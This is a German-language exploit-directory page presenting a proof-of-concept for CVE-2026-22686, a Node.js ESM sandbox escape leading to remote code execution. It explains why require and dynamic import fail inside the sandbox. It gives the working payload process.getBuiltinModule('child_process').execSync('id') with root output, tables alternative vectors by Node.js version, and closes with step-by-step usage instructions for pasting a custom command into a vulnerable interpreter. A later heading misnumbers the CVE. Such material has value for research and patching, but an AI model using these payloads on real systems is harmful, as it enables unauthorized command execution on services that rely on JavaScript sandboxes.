Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22686-RemoteCodeExecution-RCE-PoC — Proof-of-Concept-Exploit für CVE-2026-22686, der Remote-Codeausführung in Node.js-ESM-Sandboxes über process.getBuiltinModule demonstriert, um Modulbeschränkungen zu umgehen. | Kitploit
Tools/GitHubGitHub/moltengama/cve-2026-22686-remotecodeexecution-rce-poc
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPayload-Entwicklung
GitHubmoltengama/cve-2026-22686-remotecodeexecution-rce-poc

CVE-2026-22686-RemoteCodeExecution-RCE-PoC

Proof-of-Concept-Exploit für CVE-2026-22686, der Remote-Codeausführung in Node.js-ESM-Sandboxes über process.getBuiltinModule demonstriert, um Modulbeschränkungen zu umgehen.

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RCE in ESM-Umgebungen — Das require-Problem

Beim Erreichen einer Sandbox-Escape über CVE-2026-22686 erfordert die Ausführung von OS-Befehlen in einem ESM-Projekt ("type": "module") die Umgehung der Node.js-Modulladebeschränkungen. Standardansätze schlagen aus folgenden Gründen fehl:

VektorErgebnis
require('child_process')❌ require is not defined — in ESM nicht verfügbar
process.mainModule.require(...)❌ Cannot read properties of undefined — mainModule ist in ESM undefined
import('child_process')❌ A dynamic import callback was not specified — erfordert einen Hook, der in der Sandbox nicht konfiguriert ist
process.binding('spawn_sync')⚠️ Verfügbar, aber zu niedrigstufig — erfordert manuellen Syscall-Aufbau

Lösung: Prozess-Enumeration → process.getBuiltinModule

Statt eine Modullademethode anzunehmen, enumerieren wir process-Schlüssel direkt aus dem Host-Kontext (bereits nach der Sandbox-Escape zugänglich):

root@kitploit:~
return Object.keys(process)

Unter den zurückgegebenen Schlüsseln wurde getBuiltinModule identifiziert — eine native Node.js-22+-API, die speziell dafür entwickelt wurde, ESM-Modulen den Zugriff auf eingebaute Node.js-Module ohne require oder import() zu ermöglichen.

root@kitploit:~
process.getBuiltinModule('child_process').execSync('id').toString()
// → uid=0(root) gid=0(root) groups=0(root)  ✅ RCE bestätigt

Dies ist die Kernerkenntnis: process.getBuiltinModule ist eine relativ neue API (Node.js >= 22.3.0) und wird von Sandbox-Implementierungen und WAF-Regeln, die require und import blockieren, häufig übersehen.


Alternative Vektoren (nach Node.js-Version)

Abhängig von der Zielumgebung können nach der Enumeration von process weitere Vektoren verfügbar sein:

VektorNode.js-VersionHinweise
process.getBuiltinModule('child_process')>= 22.3.0✅ Sauberste Lösung — offizielle ESM-sichere API
process.binding('spawn_sync')Alle⚠️ Niedrigstufig, erfordert manuellen Pufferaufbau
process.mainModule.require(...)Nur CJS❌ In ESM undefiniert
__non_webpack_require__Webpack-Bundles⚠️ Umgebungsspezifisch
Module.createRequire(import.meta.url)>= 12.2.0⚠️ Benötigt Module-Referenz vom Host
process._linkedBinding('node_os')Interne Builds⚠️ Selten exponiert

Fazit: Enumerieren Sie nach Erreichen des Host-Kontextzugriffs immer Object.keys(process). Die verfügbare Angriffsfläche variiert erheblich je nach Node.js-Version und Projektkonfiguration. getBuiltinModule ist der zuverlässigste Vektor in modernen Node.js-ESM-Umgebungen.

CVE-2026-2268-RemoteCodeExecution-RCE-PoC

Schritte:

  1. Fügen Sie Ihren persönlichen Befehl ein
  2. Fügen Sie das resultierende Payload, das generiert wurde, in Ihren verwundbaren JS-Sandbox-Interpreter ein
  3. Genießen Sie die Ergebnisse
image
Tool herunterladen